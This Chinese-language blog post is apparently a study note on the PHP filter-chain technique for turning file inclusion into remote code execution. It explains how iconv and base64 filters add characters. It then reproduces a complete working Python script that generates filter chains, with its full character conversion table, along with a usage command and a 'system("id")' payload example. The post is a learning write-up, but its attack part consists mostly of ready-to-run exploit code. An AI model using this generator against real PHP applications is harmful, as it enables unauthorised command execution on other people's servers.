<!--
	作者：Sariay
	时间：2018-08-26
	描述：There may be a bug, but don't worry, Qiling(器灵) says that it can work normally! aha!
-->
<!DOCTYPE html>
<html class="html-loading">
		

<head>
	<meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
	<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1.0, user-scalable=no">
  <title>
    
      filter-chain漏洞演示 | Su@sU的世界
    
  </title>
  <meta name="author" content="Su@sU">
  <meta name="keywords" content="web 游戏" />
  <meta name="description" content="一个什么都感兴趣的人的胡思乱想" />
	<!-- favicon -->
  <link rel="shortcut icon" href="/img/favicon.ico">

  <!-- css -->
  
<link rel="stylesheet" href="/css/Annie.css">

  
  <!-- jquery -->
	
<script src="/plugin/jquery/jquery.min.js"></script>


<script>
    const CONFIG_BGIMAGE = {
      mode: 'normal',
      normalSrc: '/img/header-bg.jpg',
      randomYouMax: 110,
      randomYouSrc: 'https://sariay.github.io/Random-img/',
	  randomOtherSrc: 'https://api.berryapi.net/?service=App.Bing.Images&day=-0',
	  preloaderEnable: true
    }
	
    const CONFIG_LEACLOUD_COUNT = {
      enable: false,
	  appId: 'AU8...',
	  appKey: '4cU...',
	  serverURLs: 'http' || ' '
    }
  </script>
<meta name="generator" content="Hexo 8.1.1"></head>
	<body>
		<!-- Preloader -->

	<div id="preloader">
		<div class="pre-container">
			
				<div class="spinner">
					<div class="double-bounce1"></div>
					<div class="double-bounce2"></div>
				</div>
						
		</div>
	</div>


<!-- header -->
<header class="fixbackground bg-pan-br">
	<div class="mask">
		<!-- motto -->
		<div class="h-body">	
			
				<div class="motto text-shadow-pop-left">
					<p class="content" id="motto-content">获取中...</p>
					<p>-<p>
					<p class="author" id="motto-author">Just a minute...</p>
				</div>
			
		</div>
		
		<!-- others: such as time... -->			
		<div class="h-footer">
			<a href="javascript:;" id="read-more" class="scroll-down">
				<span class="icon-anchor1 animation-scroll-down"></span>
			</a>
		</div>
	</div>
</header>

<div id="navigation-hide">
	<!-- Progress bar -->
	<div id="progress-bar"></div>

	<!-- Progress percent -->
	<div id="progress-percentage"><span>0.0%</span></div>

	<div class="toc-switch"><span class="switch-button">目录</span></div>

	<!-- Page title -->
	<p>
		
			「filter-chain漏洞演示」
		
	</p>

	
	

	<!-- Nav trigger for navigation-H-->
	<a class="nav-trigger"><span></span></a>
</div>

<!-- Navigation in div(id="navigation-H") -->
<nav class="nav-container" id="cd-nav">
	<div class="nav-header">
		<span class="logo"> 
			<img src="/img/logo.png">
		</span>
		<a href="javascript:;" class="nav-close"></a>
	</div>
	
	<div class="nav-body">
		<ul id="global-nav">
	
		<li class="menu-home">
			<a href="/" class="menu-item-home" target="_blank">主页</a>
		</li>
		
	
		<li class="menu-archive">
			<a href="/archives" class="menu-item-archive" target="_blank">归档</a>
		</li>
		
	
		<li class="menu-categories">
			<a href="/categories" class="menu-item-categories" target="_blank">分类</a>
		</li>
		
	
		<li class="menu-tags">
			<a href="/tags" class="menu-item-tags" target="_blank">标签</a>
		</li>
		
	
		<li class="menu-about">
			<a href="/about" class="menu-item-about" target="_blank">关于</a>
		</li>
		
	
		<li class="menu-gallery">
			<a href="/gallery" class="menu-item-gallery" target="_blank">相册</a>
		</li>
		
	

	
		<li class="menu-search">
			<a href="javascript:;" class="popup-trigger">搜索</a>
		</li>
	
</ul>
	</div>
	
	<div class="nav-footer">
		<ul id="global-social">
	
		<li>
			<a href="http://github.com/" target="_blank">
				<span class="icon-one"><span class="path1"></span><span class="path2"></span></span>
			</a>
		</li>
	
		<li>
			<a href="http://github.com/" target="_blank">
				<span class="icon-zhihu"></span>
			</a>
		</li>
	
		<li>
			<a href="http://github.com/" target="_blank">
				<span class="icon-github"></span>
			</a>
		</li>
	
		<li>
			<a href="http://github.com/" target="_blank">
				<span class="icon-sina-weibo "></span>
			</a>
		</li>
	
		<li>
			<a href="http://github.com/" target="_blank">
				<span class="icon-pinterest2"></span>
			</a>
		</li>
	
		<li>
			<a href="http://github.com/" target="_blank">
				<span class="icon-instagram"></span>
			</a>
		</li>
	
		<li>
			<a href="http://github.com/" target="_blank">
				<span class="icon-twitter"></span>
			</a>
		</li>
	
		<li>
			<a href="/atom.xml" target="_blank">
				<span class="icon-rss"></span>
			</a>
		</li>
			
</ul>

	</div>
</nav>
			
		<!--main-->
		<main>
			<!--
	时间：2018-11-17
	描述：
		插件名称：katelog.min.js
		插件作者：KELEN
		插件来源: https://github.com/KELEN/katelog
-->

	
		<div class="layout-toc">
			<div id="layout-toc">
				<div class="k-catelog-list" id="catelog-list" data-title="文章目录"></div>
			</div>
		</div>

		
<script src="/plugin/toc/katelog.min.js"></script>


		
	 

<div class="layout-post">
	<div id="layout-post">
		<div class="article-title">
			
	<a href="/2026/04/19/filter-chain%E6%BC%8F%E6%B4%9E%E6%BC%94%E7%A4%BA/" itemprop="url">
		filter-chain漏洞演示
	</a>

		</div>

		<div class="article-meta">
			<span>
				<i class="icon-calendar1"></i>
				
				




	更新于

	<a href="/2026/04/19/filter-chain%E6%BC%8F%E6%B4%9E%E6%BC%94%E7%A4%BA/" itemprop="url">
		<time datetime="2026-04-19T04:00:00.000Z" itemprop="dateUpdated">
	  		2026-06-21
	  </time>
	</a> 



			</span>
			<span>
						
			</span>
			
			



		</div>

		<div class="article-content" id="article-content">
			<p>这个漏洞链被称为CNEXT 由安全员Charles Fol披露</p>
<p>核心思想是利用系统内置的看似无害的模块（流过滤器）的巧妙组合 在受限的web环境之中执行命令</p>
<h2 id="原理讲解"><a href="#原理讲解" class="headerlink" title="原理讲解"></a>原理讲解</h2><h3 id="filter协议"><a href="#filter协议" class="headerlink" title="filter协议"></a>filter协议</h3><p>对于filter伪协议 我们肯定都不陌生<br>这个伪协议允许我们在输入字节流之中加入一些过滤器<br>在这个漏洞的学习之中我们需要用到以下过滤器以下这些</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">`convert.base64-encode`：执行base64加密处理</span><br><span class="line">`convert.base64-decode`：执行base64解密</span><br><span class="line">`convert.iconv.X.Y`：将字符串从X编码转换为Y编码形式</span><br></pre></td></tr></table></figure>

<h4 id="convert-base64-decode过滤"><a href="#convert-base64-decode过滤" class="headerlink" title="convert.base64-decode过滤"></a>convert.base64-decode过滤</h4><p>我们知道 当<code>convert.base64-decode</code>解码字符串的时候 它之后解码base64内容(a-z,A-Z,0-9,+&#x2F;) 之前学习死亡绕过的时候也曾经学习过这一点</p>
<h4 id="convert-iconv-X-Y添加字符"><a href="#convert-iconv-X-Y添加字符" class="headerlink" title="convert.iconv.X.Y添加字符"></a>convert.iconv.X.Y添加字符</h4><p>这个过滤器就是将字节流从X编码形式转换成Y编码形式<br>我们发现将字符串从UTF-8转换为CSISO2022KR 原先的字符串前面会加上一个不可见字符和$)C<br>比如原先的字符串是</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SusUnb666</span><br></pre></td></tr></table></figure>
<p>我们经过转换</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">php://filter/convert.iconv.UTF8.CSISO2022KR/resource=data://text/plain,SusUnb666</span><br><span class="line"></span><br><span class="line">结果变成了</span><br><span class="line">\x1b$)CSusUnb666（前面这个\x1b是不可见字符）</span><br></pre></td></tr></table></figure>
<p>等于说是不管这么转换都换在字符串前面加上\x1b$)C<br>我们发现加上的部分里面除了C都不是base64字符</p>
<h3 id="结合两种伪协议特性构造任意RCE"><a href="#结合两种伪协议特性构造任意RCE" class="headerlink" title="结合两种伪协议特性构造任意RCE"></a>结合两种伪协议特性构造任意RCE</h3><p>我们思考 既然incov协议能够添加字符 base64-decode能够去除base64字符之外的字符 那么是不是说我们就添加进了一个安全的base64字符 而我们RCE常常使用的也就是base64字符<br>那么就可以使用多次过滤器为字符串添加我们想要的字符</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">php://filter/read=convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode/resource=data://text/plain,SusUnb666</span><br><span class="line"></span><br><span class="line">得到结果就是CSusUnb666</span><br></pre></td></tr></table></figure>
<p>那么对于其他字母我们也是可以通过不同的过滤器组合添加到字符串之中的</p>
<p>这里给出大佬的脚本 </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br></pre></td><td class="code"><pre><span class="line">import argparse  </span><br><span class="line">import base64  </span><br><span class="line">import re  </span><br><span class="line">  </span><br><span class="line"># - Useful infos -  </span><br><span class="line"># https://book.hacktricks.xyz/pentesting-web/file-inclusion/lfi2rce-via-php-filters  </span><br><span class="line"># https://github.com/wupco/PHP_INCLUDE_TO_SHELL_CHAR_DICT  </span><br><span class="line"># https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d  </span><br><span class="line">  </span><br><span class="line"># No need to guess a valid filename anymore  </span><br><span class="line">file_to_use = &quot;php://temp&quot;  </span><br><span class="line">  </span><br><span class="line">conversions = &#123;  </span><br><span class="line">    &#x27;0&#x27;: &#x27;convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2&#x27;,  </span><br><span class="line">    &#x27;1&#x27;: &#x27;convert.iconv.ISO88597.UTF16|convert.iconv.RK1048.UCS-4LE|convert.iconv.UTF32.CP1167|convert.iconv.CP9066.CSUCS4&#x27;,  </span><br><span class="line">    &#x27;2&#x27;: &#x27;convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP949.UTF32BE|convert.iconv.ISO_69372.CSIBM921&#x27;,  </span><br><span class="line">    &#x27;3&#x27;: &#x27;convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.ISO6937.8859_4|convert.iconv.IBM868.UTF-16LE&#x27;,  </span><br><span class="line">    &#x27;4&#x27;: &#x27;convert.iconv.CP866.CSUNICODE|convert.iconv.CSISOLATIN5.ISO_6937-2|convert.iconv.CP950.UTF-16BE&#x27;,  </span><br><span class="line">    &#x27;5&#x27;: &#x27;convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.8859_3.UCS2&#x27;,  </span><br><span class="line">    &#x27;6&#x27;: &#x27;convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.CSIBM943.UCS4|convert.iconv.IBM866.UCS-2&#x27;,  </span><br><span class="line">    &#x27;7&#x27;: &#x27;convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.iconv.ISO-IR-103.850|convert.iconv.PT154.UCS4&#x27;,  </span><br><span class="line">    &#x27;8&#x27;: &#x27;convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2&#x27;,  </span><br><span class="line">    &#x27;9&#x27;: &#x27;convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB&#x27;,  </span><br><span class="line">    &#x27;A&#x27;: &#x27;convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213&#x27;,  </span><br><span class="line">    &#x27;a&#x27;: &#x27;convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE&#x27;,  </span><br><span class="line">    &#x27;B&#x27;: &#x27;convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000&#x27;,  </span><br><span class="line">    &#x27;b&#x27;: &#x27;convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE&#x27;,  </span><br><span class="line">    &#x27;C&#x27;: &#x27;convert.iconv.UTF8.CSISO2022KR&#x27;,  </span><br><span class="line">    &#x27;c&#x27;: &#x27;convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2&#x27;,  </span><br><span class="line">    &#x27;D&#x27;: &#x27;convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213&#x27;,  </span><br><span class="line">    &#x27;d&#x27;: &#x27;convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5&#x27;,  </span><br><span class="line">    &#x27;E&#x27;: &#x27;convert.iconv.IBM860.UTF16|convert.iconv.ISO-IR-143.ISO2022CNEXT&#x27;,  </span><br><span class="line">    &#x27;e&#x27;: &#x27;convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UTF16.EUC-JP-MS|convert.iconv.ISO-8859-1.ISO_6937&#x27;,  </span><br><span class="line">    &#x27;F&#x27;: &#x27;convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB&#x27;,  </span><br><span class="line">    &#x27;f&#x27;: &#x27;convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213&#x27;,  </span><br><span class="line">    &#x27;g&#x27;: &#x27;convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8&#x27;,  </span><br><span class="line">    &#x27;G&#x27;: &#x27;convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90&#x27;,  </span><br><span class="line">    &#x27;H&#x27;: &#x27;convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213&#x27;,  </span><br><span class="line">    &#x27;h&#x27;: &#x27;convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE&#x27;,  </span><br><span class="line">    &#x27;I&#x27;: &#x27;convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.BIG5.SHIFT_JISX0213&#x27;,  </span><br><span class="line">    &#x27;i&#x27;: &#x27;convert.iconv.DEC.UTF-16|convert.iconv.ISO8859-9.ISO_6937-2|convert.iconv.UTF16.GB13000&#x27;,  </span><br><span class="line">    &#x27;J&#x27;: &#x27;convert.iconv.863.UNICODE|convert.iconv.ISIRI3342.UCS4&#x27;,  </span><br><span class="line">    &#x27;j&#x27;: &#x27;convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.iconv.CP950.UTF16&#x27;,  </span><br><span class="line">    &#x27;K&#x27;: &#x27;convert.iconv.863.UTF-16|convert.iconv.ISO6937.UTF16LE&#x27;,  </span><br><span class="line">    &#x27;k&#x27;: &#x27;convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2&#x27;,  </span><br><span class="line">    &#x27;L&#x27;: &#x27;convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.R9.ISO6937|convert.iconv.OSF00010100.UHC&#x27;,  </span><br><span class="line">    &#x27;l&#x27;: &#x27;convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE&#x27;,  </span><br><span class="line">    &#x27;M&#x27;:&#x27;convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.iconv.UTF16BE.866|convert.iconv.MACUKRAINIAN.WCHAR_T&#x27;,  </span><br><span class="line">    &#x27;m&#x27;:&#x27;convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.CP1163.CSA_T500|convert.iconv.UCS-2.MSCP949&#x27;,  </span><br><span class="line">    &#x27;N&#x27;: &#x27;convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4&#x27;,  </span><br><span class="line">    &#x27;n&#x27;: &#x27;convert.iconv.ISO88594.UTF16|convert.iconv.IBM5347.UCS4|convert.iconv.UTF32BE.MS936|convert.iconv.OSF00010004.T.61&#x27;,  </span><br><span class="line">    &#x27;O&#x27;: &#x27;convert.iconv.CSA_T500.UTF-32|convert.iconv.CP857.ISO-2022-JP-3|convert.iconv.ISO2022JP2.CP775&#x27;,  </span><br><span class="line">    &#x27;o&#x27;: &#x27;convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-4LE.OSF05010001|convert.iconv.IBM912.UTF-16LE&#x27;,  </span><br><span class="line">    &#x27;P&#x27;: &#x27;convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB&#x27;,  </span><br><span class="line">    &#x27;p&#x27;: &#x27;convert.iconv.IBM891.CSUNICODE|convert.iconv.ISO8859-14.ISO6937|convert.iconv.BIG-FIVE.UCS-4&#x27;,  </span><br><span class="line">    &#x27;q&#x27;: &#x27;convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.GBK.CP932|convert.iconv.BIG5.UCS2&#x27;,  </span><br><span class="line">    &#x27;Q&#x27;: &#x27;convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500-1983.UCS-2BE|convert.iconv.MIK.UCS2&#x27;,  </span><br><span class="line">    &#x27;R&#x27;: &#x27;convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4&#x27;,  </span><br><span class="line">    &#x27;r&#x27;: &#x27;convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.ISO-IR-99.UCS-2BE|convert.iconv.L4.OSF00010101&#x27;,  </span><br><span class="line">    &#x27;S&#x27;: &#x27;convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.SJIS&#x27;,  </span><br><span class="line">    &#x27;s&#x27;: &#x27;convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90&#x27;,  </span><br><span class="line">    &#x27;T&#x27;: &#x27;convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500.L4|convert.iconv.ISO_8859-2.ISO-IR-103&#x27;,  </span><br><span class="line">    &#x27;t&#x27;: &#x27;convert.iconv.864.UTF32|convert.iconv.IBM912.NAPLPS&#x27;,  </span><br><span class="line">    &#x27;U&#x27;: &#x27;convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943&#x27;,  </span><br><span class="line">    &#x27;u&#x27;: &#x27;convert.iconv.CP1162.UTF32|convert.iconv.L4.T.61&#x27;,  </span><br><span class="line">    &#x27;V&#x27;: &#x27;convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB&#x27;,  </span><br><span class="line">    &#x27;v&#x27;: &#x27;convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.ISO-8859-14.UCS2&#x27;,  </span><br><span class="line">    &#x27;W&#x27;: &#x27;convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936&#x27;,  </span><br><span class="line">    &#x27;w&#x27;: &#x27;convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE&#x27;,  </span><br><span class="line">    &#x27;X&#x27;: &#x27;convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932&#x27;,  </span><br><span class="line">    &#x27;x&#x27;: &#x27;convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS&#x27;,  </span><br><span class="line">    &#x27;Y&#x27;: &#x27;convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361&#x27;,  </span><br><span class="line">    &#x27;y&#x27;: &#x27;convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT&#x27;,  </span><br><span class="line">    &#x27;Z&#x27;: &#x27;convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16&#x27;,  </span><br><span class="line">    &#x27;z&#x27;: &#x27;convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937&#x27;,  </span><br><span class="line">    &#x27;/&#x27;: &#x27;convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4&#x27;,  </span><br><span class="line">    &#x27;+&#x27;: &#x27;convert.iconv.UTF8.UTF16|convert.iconv.WINDOWS-1258.UTF32LE|convert.iconv.ISIRI3342.ISO-IR-157&#x27;,  </span><br><span class="line">    &#x27;=&#x27;: &#x27;&#x27;  </span><br><span class="line">&#125;  </span><br><span class="line">  </span><br><span class="line">def generate_filter_chain(chain, debug_base64 = False):  </span><br><span class="line">  </span><br><span class="line">    encoded_chain = chain  </span><br><span class="line">    # generate some garbage base64  </span><br><span class="line">    filters = &quot;convert.iconv.UTF8.CSISO2022KR|&quot;  </span><br><span class="line">    filters += &quot;convert.base64-encode|&quot;  </span><br><span class="line">    # make sure to get rid of any equal signs in both the string we just generated and the rest of the file  </span><br><span class="line">    filters += &quot;convert.iconv.UTF8.UTF7|&quot;  </span><br><span class="line">  </span><br><span class="line">  </span><br><span class="line">    for c in encoded_chain[::-1]:  </span><br><span class="line">        filters += conversions[c] + &quot;|&quot;  </span><br><span class="line">        # decode and reencode to get rid of everything that isn&#x27;t valid base64  </span><br><span class="line">        filters += &quot;convert.base64-decode|&quot;  </span><br><span class="line">        filters += &quot;convert.base64-encode|&quot;  </span><br><span class="line">        # get rid of equal signs  </span><br><span class="line">        filters += &quot;convert.iconv.UTF8.UTF7|&quot;  </span><br><span class="line">    if not debug_base64:  </span><br><span class="line">        # don&#x27;t add the decode while debugging chains  </span><br><span class="line">        filters += &quot;convert.base64-decode&quot;  </span><br><span class="line">  </span><br><span class="line">    final_payload = f&quot;php://filter/&#123;filters&#125;/resource=&#123;file_to_use&#125;&quot;  </span><br><span class="line">    return final_payload  </span><br><span class="line">  </span><br><span class="line">def main():  </span><br><span class="line">  </span><br><span class="line">    # Parsing command line arguments  </span><br><span class="line">    parser = argparse.ArgumentParser(description=&quot;PHP filter chain generator.&quot;)  </span><br><span class="line">  </span><br><span class="line">    parser.add_argument(&quot;--chain&quot;, help=&quot;Content you want to generate. (you will maybe need to pad with spaces for your payload to work)&quot;, required=False)  </span><br><span class="line">    parser.add_argument(&quot;--rawbase64&quot;, help=&quot;The base64 value you want to test, the chain will be printed as base64 by PHP, useful to debug.&quot;, required=False)  </span><br><span class="line">    args = parser.parse_args()  </span><br><span class="line">    if args.chain is not None:  </span><br><span class="line">        chain = args.chain.encode(&#x27;utf-8&#x27;)  </span><br><span class="line">        base64_value = base64.b64encode(chain).decode(&#x27;utf-8&#x27;).replace(&quot;=&quot;, &quot;&quot;)  </span><br><span class="line">        chain = generate_filter_chain(base64_value)  </span><br><span class="line">        print(&quot;[+] The following gadget chain will generate the following code : &#123;&#125; (base64 value: &#123;&#125;)&quot;.format(args.chain, base64_value))  </span><br><span class="line">        print(chain)  </span><br><span class="line">    if args.rawbase64 is not None:  </span><br><span class="line">        rawbase64 = args.rawbase64.replace(&quot;=&quot;, &quot;&quot;)  </span><br><span class="line">        match = re.search(&quot;^([A-Za-z0-9+/])*$&quot;, rawbase64)  </span><br><span class="line">        if (match):  </span><br><span class="line">            chain = generate_filter_chain(rawbase64, True)  </span><br><span class="line">            print(chain)  </span><br><span class="line">        else:  </span><br><span class="line">            print (&quot;[-] Base64 string required.&quot;)  </span><br><span class="line">            exit(1)  </span><br><span class="line">  </span><br><span class="line">if __name__ == &quot;__main__&quot;:  </span><br><span class="line">    main()</span><br></pre></td></tr></table></figure>
<p>使用方法是</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 php_filter_generator.py --chain &#x27;xxx&#x27;</span><br></pre></td></tr></table></figure>
<h4 id="对于特殊字符转换的原理分析"><a href="#对于特殊字符转换的原理分析" class="headerlink" title="对于特殊字符转换的原理分析"></a>对于特殊字符转换的原理分析</h4><p>我们起那面所说的这些构造都是基于所添加字符是base64字符的情况 但是事实上我们编写RCE代码的时候还存在比如括号引号这些特殊字符 那么这个脚本是如何实现构造的呢</p>
<p>举个例子 比如我们要传入的内容格式<code>&#39;&lt;?php system(&quot;id&quot;);?&gt;&#39;</code><br> 工作流程如下</p>
<ol>
<li>将输入转换成纯base64字符串<br> <code>Jzw/cGhwIHN5c3RlbSgiaWQiKTs/Pic=</code></li>
<li>逆向构造 针对这个Base64字符串的每个字符（此时就都是base64字符了）找到对应的iconv构造链</li>
<li>生成总过滤链：每次添加一个字符之后 都跟想一系列<code>convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7</code> 来清除垃圾并保持格式</li>
<li>最终解码 将前面所有构造出来·的base64字符串内容编码会原始的PHP代码</li>
</ol>
<p>综上所述就是这个脚本能够完成构造的原因<br>这个漏洞本质就是利用filter协议不同过滤器之间组合进行RCE编写<br><strong>参考文章</strong><br><a target="_blank" rel="noopener" href="https://zlaryy123.github.io/2026/04/02/flask%20session%E4%BC%AA%E9%80%A0%E4%B8%8Efilter-chain/">flask的session伪造与filter-chain | ZLARYY</a></p>
<p><a target="_blank" rel="noopener" href="https://www.leavesongs.com/PENETRATION/php-filter-magic.html">谈一谈php:&#x2F;&#x2F;filter的妙用 | 离别歌</a></p>
	
		</div>
		
		<div id="current-post-cover" data-scr="/images/covers/daliyuese.jpg"></div>

		<!-- relate post, comment...-->
		<div class="investment-container">
			<div class="investment-header">
				<div class="investment-title-1">
					<div class="on">相关文章</div>
					<div>评论</div>
					<div>分享</div>
				</div>
				<div class="investment-title-2">	            
					
	<span>
		<a id="totop-post-page">返回顶部</a>
		
		
			<a href="/2026/04/19/%E6%AD%BB%E4%BA%A1%E7%BB%95%E8%BF%87/" title="死亡绕过" rel="next">
				下一篇&raquo;
			</a>
			
	</span>


      		
				</div>	
			</div>
			
			<div class="investment-content">
				<div class="investment-content-list">
					

<div class="relate-post">
	
		<ul>
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2026/04/19/%E6%AD%BB%E4%BA%A1%E7%BB%95%E8%BF%87/" title="死亡绕过">
								死亡绕过			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								四月 19日, 2026				
							</p>
							<p class="relate-post-content">
								前言以及环境介绍本文是对p神文章谈一谈php:&#x2F;&#x2F;filter的妙用 | 离别歌知识点的学习
本文主要介绍使用filter伪协议进行死亡绕过的三种方式
测试环境：小皮面板测试代码：exit.php
12345&lt...
							</p>
						</div>

